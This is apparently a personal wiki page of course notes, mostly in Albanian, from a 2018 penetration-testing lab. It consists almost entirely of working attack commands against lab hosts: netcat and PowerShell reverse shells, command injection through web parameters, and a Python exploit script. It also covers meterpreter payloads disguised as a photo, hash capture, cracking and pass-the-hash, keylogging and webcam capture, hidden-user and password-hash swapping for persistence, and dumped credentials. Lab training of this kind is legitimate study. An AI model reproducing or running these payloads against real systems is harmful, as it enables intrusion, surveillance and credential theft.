dardan:cyberacademy:challenges
###INTERRUPT IN BOOT###
Kur t'bohet load Grub Screen, e shtypim E
mount -o remount,rw /
.##################################################################################
###HAP BACKDOOR####
ne host A e hap nje port
#nc -lvp 667 -e /bin/bash
nga host B lidhet ne host A
#nc 192.168.0.110 667
.##################################################################################
###SKENAR### ### DIRB & CURL ###
172.16.60.59 ##Target IP
nje Ip me hack, enumeration, to get access, verify
-e gjen linkun problematik me dirb ( directory browse)
-e bon run skipten ne file e dyshimt per ta hap session
root@CyberACAD:/home/dardan# curl http://172.16.60.59/index.php\?cmd\=nc+-lvp+31337+-e+/bin/bash
-per tju qas sessionit te hapur me lart
dardan@CyberACAD:~$ nc 172.16.60.59 31337
echo 'index.php' | base64 ## encode
echo 'aW5kZXgucGhwCg==' | base64 -d ## decode
.##################################################################################
###SKENAR###WORDPRESS###
merr nje file
#wget http://wordpress.org/latest.zip
#wget http://wordpress.org/latest.tar.gz
unzip
#unzip latest.zip
#tar -zxvf latest.tar.gz
#delete latest.zip
#rm -rf latest.zip
barte file to var/www/html nese e ke shakrku duku tjeter
#mv wordpress var/www/html
barti krejt nga wordpress folderi nje hap mbrapa
#mv * ../
Access mysql
#mysql -u root -p
#create db
#create database dr;
edit sample file
#vi wp-config-sample.php
#edit
#database name / user / password
replace modified file
#mv wp-config-sample.php wp-config.php
ne browser krijo account ne WP
#http://IP ose name i appache service
krijo user ne web form
###Script me kriju e cila e shkarkon wordpress edhe i exekution krejt hapat si ne ushtrime###
#! /bin/bash
cd /var/www/html
wget http://wordpress.org/latest.zip
unzip latest.zip
cd wordpress
mv * ../
cd ..
rm -rf latest.zip wordpress
cp wp-config-sample.php wp-config.php
mysql -uroot -pPassword -e "create database xxDB;"
Ose
mysql --host=localhost --user=root -pPassword
CREATE DATABASE xxDB;
SHOW databases;
chmode a=x wp-auto ## e bon executable
bash wp-auto ## ose e bon run si script
link
http://www.codingpedia.org/ama/how-to-create-a-mysql-database-from-command-line/
.##################################################################################
###SKENAR###Me kriju qasje ne SSH pa u athentiku###
krijo file ~/.ssh
un-auth access client to server
mkdir.ssh/ ##create .ssh if it is not created
server@CyberACAD:~/.ssh$ ssh-keygen ## generate keys
scp id_rsa.pub client@172.16.60.47:/home/client/.ssh/
client@xx:~/home/client/.ssh$ mv id_rsa.pub authorized_keys
ssh server@172.16.60.47 ## try to access client to server
:)
#ne Server
ssh-keygen
touch authorized_keys
cat id_rsa.pub > authotized_keys
.##################################################################################
###backdoor, remote code execution, intro###
curl https://google.com ##Lexon kontentin
curl https://google.com/x.php?cmd\=cat+/passwd
cmd\=cat+/passwd
cmd\=cat+/
curl http://172.16.60.59/run.php\?cmd\=nc+-lvp+31337+-e+/bin/bash
.##################################################################################
###SKENAR###me marr qasje prej mysql ne shell access###
\! nc -lvp 8888 -e /bin/bash
\! id
nc ip 8888
ls
id
dw wp
unzip
cmv wp content to /html
mysql -u root -p
creat database xx;
edito wp-config.php db name, user, password
brows IP/wp-config.php
create user/password
install wordpress
cd user/share/webshell
create a file with code run.php upload on /html
curl http://ip/run.php\?cmd\=nc+-lvp+1337+-e+bin/bash
nc ip 1337
id
ls
cat wp-config.php
python-c 'import pty; pty.spawn("/bin/bash")'
mysql -u$root -p$xxxx -e "\! id"
"os python libraria" ta jep mundesi me execute comanda te systemit
mysql -H ip ## te qon remote
.##################################################################################
###SKENAR###Challenge###
1.Keni me startu nje web apache server, me gjeneru log-sa, me gjeneru spaku 100 lines of code, keni me ndertu nje automated script me kete logjike, ku IP unike i merr dhe i kthen ne base64, dhe i ke echo vetem vlerat e base64. Pra me lexu log-un, access.log edhe me i nxjerr IP me i sortu unike dhe me i kthye vetem vlerat e tyre base64, e jo ne plain text.
Startim i web apache server te gjenerimi i logsave logs of code gjenerete script ku me i nxjerr ip dhe me i kthy ip ne base 64
Zgjidhja:
#!/bin/bash
cat /var/log/apache2/access.log | grep "172.16" | cut -d " " -f 1 | sort -u > ips.txt
for i in $(cat ips.txt); do echo $i| base64; done
2.Research qysh me shtu user pa kriju home directory- kur shkon ne Ls /home/ mos me ekzistu, basically i bjen user i fshehte
Dhe ne Ssh me u kyc me kete user qe kemi krijuar pa home directory
3. Heqeni hash-in, shtoni hash-in e juaj, kycuni me passwordin e hash-it juaj, kryeni pune dhe pasi te kryeni pune ktheni hash-in qe ishte fillimisht.
Eshte nje password “ubuntu” ky password e ka nje hash, ky hash nuk mundet kurre me u kthy ne “ubuntu”, gjithmone eshte ky hash value, ky hash eshte i ruajtur ne /etc/shadow, ne nuk e dijme qe ky hash e ka plain text “ubuntu”, per kete arsye duhet me e heq kete hash dhe me shtu nje hash te ri, ku ne e dijme passwrodin. Psh password e kthejme ne hash, dhe kete hash e ruajme atje ku duam ta nderrojme hashin. Pastaj mund tbejme login si password, kryjme pune dhe pastaj e kthejme hashin “ubuntu”.
Ekziston encrypted sh512 ne /etc/shadow
E kemi harru pass po dojme me bo access ne kete file qysh me e nderru hash qe me e nderru pass me e kry punen dhe me e kthye hashin e vjeter
Sudo cat /etc/shadow
Te zgjidhura nga Arbeni:
Krijimi i nje useri qe nuk ka /home directory:
https://asciinema.org/a/To1xwcgCmjb06umuOUGIAO2vF
komanda"--no-create-home" e krijon nje user pa home directory por kur mundohemi me ju qas me ssh apo protokol tjeter nuk mundemi sepse nese e lexojm fajllin /etc/passwd e shohim qe ai user nuk ka "entry point" dmth nuk ka shell /bin/bash
komanda "--no-create-home --shell /bin/bash" e ben te kunderten e komandes me lart
Shtimi apo ndrrimi i passwordit te nje useri duke modifikuar fajllin /etc/shadow
Ekzistojn disa metoda, 4 nder to jane:
https://asciinema.org/a/zk6zChlDAhR9fIrXMz5bVPckV | chpasswd
https://asciinema.org/a/hKSm9dZCY2pOqLWhAC2nr59Db | openssl
https://asciinema.org/a/PKUxOrkmvLJyuk0DlISJc8Xpb | perl
https://asciinema.org/a/y0mzjwp4YsoRTE17GGxwTIEcX | python
----------------------------------------------------------------------------
python -c 'import crypt; print crypt.crypt("arben123", "$6$SalTTeSt$")'
perl -e 'print crypt("arben123","\$6\$saltsalt\$") . "\n"'
openssl passwd -1 -salt CyBeR arben2
echo "username:password" | chpasswd
.##################################################################################
###SKENAR###Challenge##
1. Me gjet nje file qe permban keys per nje protokoll te caktuar,
2. Me u lidh me nje user te caktuar duke perdorur nje komand qe te len me percaktu keyn
3. Me ekzekutu komanda te sudo dhe me lexu nje fajll ne folderin /root
Me gjet nje file qe permban keys per nje protokoll te caktuar, e perdor per me u lidh me nje protokoll qe eshte i sigurt, useri nuk eshte sudo por lejohet te exe ca komanda si sudo
Hint:
172.16.60.81
Cmd =cd+/root
base64
Ls –al
Ssh –i fajlli IP
Sudo /bin/cat
Comment
FILES
Description
Add another file (Maximum size: 5 MB)
Save Cancel Preview
Powered by OpenProject
.##################################################################################
###SKENAR##Export SAM and system file###
reg save hklm\sam c:\sam
reg save hklm\system c:\system
##tool per mi hap sma and system files
pwdump system sam (run in folder where sam and system file are located)
.##################################################################################
###SKENAR###Responder & John & PASS the HASH###
RESPONDER
#cd /usr/share/responder/
#python Responder.py -i 192.168.1.50 -I eth0
Simulate a user typing the wrong SMB server name using SNARE01 instead of SHARE01
Error is returned to the client machine from Responder.py that windows can not access it.
#cd logs/ ls (to comfirm if hash log file is created
JOHN
#john SMBv2-NTLMv2-SSP-192.168.1.8.txt
John hash2.txt - -wordlist=/root/Desktop/rockyou.txt
John - -show hash2.txt
John - -show =hash2.txt
Cat john.pot
john hh.txt - -wordlist=/root/Desktop/rockyou.txt
john hh.txt - -show
cd
~/.john
Cd ~
Cd .john
PASS the HASH
Cd pth-toolkit-master/
./pth-winexe -U Workgroup/User%LM:NTLM //121.0.0.1 cmd
./pth-winexe -U Workgroup/User%LM:NTLM //121.0.0.1 ‘net user a a /add’
pth-winexe -U Workgroup/Administrator%5274a8ac31638590:B206D78784758497FE2540F99BDF7BF0 //192.168.1.8 cmd
xfreerdp /u:administrator /d:Workgroup /pth:B206D78784758497FE2540F99BDF7BF0 /v:192.168.1.8
*How to Secure Networks against LLMNR / NBT-NS Poisoning Attacks*
The good news is this attack is fairly easy to prevent. Note, that both LLMNR and NetBIOS Name Service need to be disabled, if you only disable LLMNR then Windows will failover to NetBIOS Name Server for resolution
.##################################################################################
###SKENAR###Challenge###16.05.2018
target 172.16.60.85 Ubuntu-10ubuntu0.1
PORT STATE SERVICE
80/tcp open http
1
# dirb http://172.16.60.85
http://172.16.60.85/id_rsa
2
# wget http://172.16.60.85/id_rsa
# chmod 400 id_rsa
# ssh -i id_rsa cyberacademy@172.16.60.85
merr qasje $
3
$ ps -aux ## per ta par executable file
$ locate xxxx.py ##per ta gjetur lokacionin
$ cd /usr/bin
$ python2.7 Administrator_Password.py ## ky tregon te dhenat e next target
Next target was a windows its credentials was given in that file
4
- me te dhenat e gjetura qasesh RDP ne target PC
- metod tjeter nga nje linux OS
# rdesktop -u Administrator 172.16.65.92
-kliko easy access (do te hapet cmd nese eshte ndrequr mepare)
me gjet hiden file me info te next target
5
ne next target machine
$ sudo -l ##tregon comands qe munet mi bo run si user
$ sudo python -c 'import pty;pty.spawn("/bin/bash");'
# :)
.##################################################################################
###SKENAR###Challenge###18.05.2018
Target 172.16.60.92
Basic Linux Commands
https://www.youtube.com/watch?v=tgcxc1xg87Y
rdesktop (ip) -r disk:share=/home/bayo/store
172.16.60.92
3389
22
445
Linux:
# rdesktop 172.16.65.120 –r disk:share=/usr/share/windows-binaries
Windows:
> nc.exe -lvp 777 -e cmd.exe
Linux: nc 172.16.60.67 777
.##################################################################################
###SKENAR###msfvenom & msfconsole###
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.68 LPORT=5560 -f exe -o foto.exe
mv foto.exe tmp/
python -m SimpleHTTPServer 80
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > show options
msf exploit(multi/handler) >set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options
msf exploit(multi/handler) > set lhost 172.16.60.68
msf exploit(multi/handler) > set lport 4477
msf exploit(multi/handler) > exploit
pret deri sa te executon dikush malware, ne kete rast te hostuar ne http
pasi te executohet malware vjen sessioni
sessions
sessions -i 5 --numrin e sesionit
##################################################################################
###SKENAR###Challenge###21.05.2018
ident. alive hosts
seq 1 254
for i in $(seq 1 254); do ping -c 1 '172.16.60.'$i;done
cat output.txt | grep 'bytes of data' | cut -d ' ' -f 2
nmap 172.16.60.0/24 ###1 check alived host, check top 1025 well known ports
nmap -sn 172.16.60.1/24 --sn e kontrollon veq a eshte hap
nmap 172.16.60.1/24 -p- -- -p- check all range ports
nmap -sS -sV 172.16.1.172 -- -p5988 ### check specific port
attempts on open ports found via nmap
ftp
try anonymous/anonymous
ftp 172.16.1.19
telnet 172.16.1.19 21
telnet 172.16.1.19
pasi ke marr access ne shell
ssh -R cyberacademy2018:80:localhost:80 serveo.net
rtsp 554 /me vlc
ne vlc network url: rtsp:172.16.1.19:554
snmp
sudo msfconsole
auxiliary
set community filename
exploit
search ms17-010
windows
# searchsploit "windows server 2008"
# locate windows/remote/41987.py
./pth-winexe -U WOURKGROUP/user%hash //172.16.1.204 cmd ### pass the hash
----------------------------------------------------------------------------
library hijack
import os
import sys
import random_useragent
while True:
ping = raw_input ("input: ")
if '&&' in ping:
print ;hacker....:
sys.exit()
elif '|' in ping:
print ;hacker....:
else
os.system('ping {}'.format(ping))
python_py aa_py
input: import os;os.system('net user a a /add')
.##################################################################################
###SKENAR###SSHUTTLE###23.05.2018
ssh uttle
Transparent proxy server that works as a poor man's VPN. Forwards over ssh.
Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
sshuttle -r turbo@172.16.65.117
ssh -R cyberacademy2018:80:localhost:80 serveo.net
http://cyberacademy.serveo.net/
google.com | ifconfig
google.com| nc -lvp 5555 -e /bin/bash
google.com && ls
172.16.65.117 (linux)
nc 172.16.65.117 5555
te ky target me ps -aux ( e sheh nje process turbo_is_turbo)
cat /etc/passwd ( per me verifiku user turbo)
putty 172.16.65.117 turbo/turbo
sudo -l (eshte gjet find qe ka root privilegje)
sudo find /etc/passwd -exec /bin/sh \;
sudo find /etc/passwd -exec nc -lvp 7878 /bin/sh \;
id
nc 172.16.65.117 7878
id
cat info.txt (target 172.16.65.120)
rdesktop 172.16.65.120
5 time shift cmd
ipconfig ( e sheh qe host eshte i lidhun edhe me nje rrjete tjeter)
arp -a (e sheh qe 10.0.1.4 ka komuniku me local host 10.0.1.3)
scanon portet me nc ose nmpa ( gjinden 21, 22, 80)
ne http te 10.0.1.4 browser tregon nje user edhe password
sudo python -c 'import pty;pty.spawn("/bin/bash");'
.##################################################################################
###SKENAR###Challenge PowerSHELL###25.05.2018
power shell
cat oneliner.tcp
ip: 172.16.60.54
nmap -sV 172.16.60.54
80 - eshte gjet hap
ne local machine
nc -lnvp 5588
permes web app ne target IP e run kete shell cmd
google.com|powershell -command "$client = New-Object System.Net.Sockets.TCPClient('172.16.60.108',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
kjo na jep qasje ne shell te target
kalo ne desktop te userit
C:\users\arben\Desktop>
Get-item -Path C:\Users\arben\Desktop\root.txt -stream *
Get-Content -Path C:\Users\arben\Desktop\root.txt -stream target.txt
cyber@172.16.60.65
pass: 123Arben123
me te dhenat e gjetura hym me ssh
ssh cyber@172.16.60.65
pass: 123Arben123
$
$ sudo -l
eshte gjet
/bin/dash /home/cyber/root_me
$ cat /home/cyber/root_me
shihet permbajtja e scriptes
#!/bin/dash
sudo /bin/dash /home/cyber/root_me
# :) root
-----------------------------------------------------------------------------
nano exploit.py
import os
import sys
import requests
ip = sys.argv[1]
port = sys.argv[2]
r = requests.get("http://172.16.60.54/system.php?ping=google.com+%26%26+powershell+-command+%22%24client+%3D+New-Object+System.Net.Sockets.TCPClient%28%27{}%27%2C{}%29%3B%24stream+%3D+%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes+%3D+0..65535%7C%25%7B0%7D%3Bwhile%28%28%24i+%3D+%24stream.Read%28%24bytes%2C+0%2C+%24bytes.Length%29%29+-ne+0%29%7B%3B%24data+%3D+%28New-Object+-TypeName+System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C+%24i%29%3B%24sendback+%3D+%28iex+%24data+2%3E%261+%7C+Out-String+%29%3B%24sendback2++%3D+%24sendback+%2B+%27PS+%27+%2B+%28pwd%29.Path+%2B+%27%3E+%27%3B%24sendbyte+%3D+%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22".format(str(ip), port))
python exploit.py IP with listen port open + port
python exploit.py 172.16.60.68 4433
.##################################################################################
###SKENAR###msfvenom###
msfvenom -p windows/meterpreter/bind_tcp LPORT=4477 -f exe -o BIND_TCP.exe
msfconsole
> use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/bind_tcp
set lport 4477
set rhost 172.16.60.76
.##################################################################################
###SKENAR###msfvenom###
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.60.68 LPORT=5560 -e elf -o reverse_tcp.elf
msfconsole
> use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
> set lhost 172.16.60.68
> set lport 5560
chmod a+x reverse_tcp.elf
hendler = pret ose servon
.##################################################################################
###SKENAR### Challenge###30.05.2018
=====================
Target: 172.16.65.97
windows/smb/ms08_067_netapi
windows/smb/psexec
run post/windows/manage/enable_dp
run post/windows/gather/
sysinfo
netstat -a
meterpreter >
shell
ipconfig, cd c:, reg same hkml\sam dhe system, net user, net localgroup administrators user /add
net user test ters
net localgroup administrators test /add
net user test /active:yes
net user Administrator
background
getsystem
getuid
getpid
ps --
pkill 2420
migrate 1756 ##kalon ne procese
keyscan_start
webcam xx ##snapshot me marr
webcam_stream
record_mic -d 10
mdf exploit(windows/smb/psexec) >
> session 2xtab
> session -i 2
msf exploit(windows/
.##################################################################################
###SKENAR###msfconsole### 01.06.2018
target: 172.16.60.96
metoda: buffer overflow, banner grabbing, metasploit, search the vurnelabilities, exploitation
nmap 172.16.60.96
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
nmap -sV --script=banner 172.16.60.96
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7 (protocol 2.0)
|_banner: SSH-2.0-OpenSSH_6.7
80/tcp open http BadBlue httpd 2.7
Service Info: Host: IEWIN7; OS: Windows; CPE: cpe:/o:microsoft:windows
msf > search badblue
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/http/badblue_ext_overflow 2003-04-20 great BadBlue 2.5 EXT.dll Buffer Overflow
exploit/windows/http/badblue_passthru 2007-12-10 great BadBlue 2.72b PassThru Buffer Overflow
###merr sessionin e pare
msf > use exploit/windows/http/badblue_passthru
msf exploit(badblue_passthru) > show options
msf exploit(badblue_passthru) > set RHOST 172.16.60.96
msf exploit(badblue_passthru) > set TARGET 1
msf exploit(badblue_passthru) > exploit
meterpreter > sysinfo
###e perdor sessionin e krijuar me pare
use exploit/windows/local/bypassuac_injection
msf exploit(bypassuac_injection) > show options
msf exploit(bypassuac_injection) > set session3 1
msf exploit(bypassuac_injection) > exploit
meterpreter > getuid
meterpreter > getsystem
meterpreter > getuid
msf > use post/windows/gatherc3/credentials/sso
msf post(sso) > show options
msf post(sso) > set session 2
msf post(sso) > exploit
[*] Running module against IEWIN7
Windows SSO Credentials
=======================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;72208 NTLM IEWIN7 IEUser Passw0rd!
0;72208 NTLM IEWIN7 IEUser
0;72286 NTLM IEWIN7 IEUser Passw0rd!
0;72286 NTLM IEWIN7 IEUser
0;83203 NTLM IEWIN7 sshd_server D@rj33l1ng
0;83203 NTLM IEWIN7 sshd_server
[*] Post module execution completed
.##################################################################################
###SKENAR###nmap, hydra ose meduza###01.06.2018
root@kali:/# nmap -sV --script=banner 172.16.60.76
Nmap scan report for 172.16.60.76
Host is up (0.0066s latency).
Not shown: 986 closed ports
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Service
Service Info: Host: ARBEN-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
brootforce RDP me hydra ose meduza tu e perdor rockyou.txt
.##################################################################################
###SKENAR###msfvenom & msfconsole###
##Challenge##04.06.2018
TARGET: 172.16.60.91
msfvenom -p python/meterpreter/reverse_tcp lhost=172.16.60.x lport=9999 -f raw >shell.py
msfconsole -q
use exploit/multi/handler
set payload python/meterpreter/reverse_tcp
show options
set lhost 172.16.60.78
set lport 9999
exploit -j
cat shell.py
copy content of shell.py
paste ne python interpreter on web
pret sessionin
sessions
sessions -i 1
getuid
shell
bash
python -c 'import pty; pty.spawn(/bin/bash")'
ls
debugger.sh
cat debugger.sh
...
.##################################################################################
###SKENAR### version of ftp running on target
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(ftp_version) > set RPORT 21
RPORT => 21
msf auxiliary(ftp_version) > exploit
[*] 127.0.0.1:21 - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_version) >
.##################################################################################
###BANNER GRABBING
nmap -sS -p 80 -A 192.168.0.1
dardan/cyberacademy/challenges.txt · Last modified: 2018/09/01 21:47 by dardan
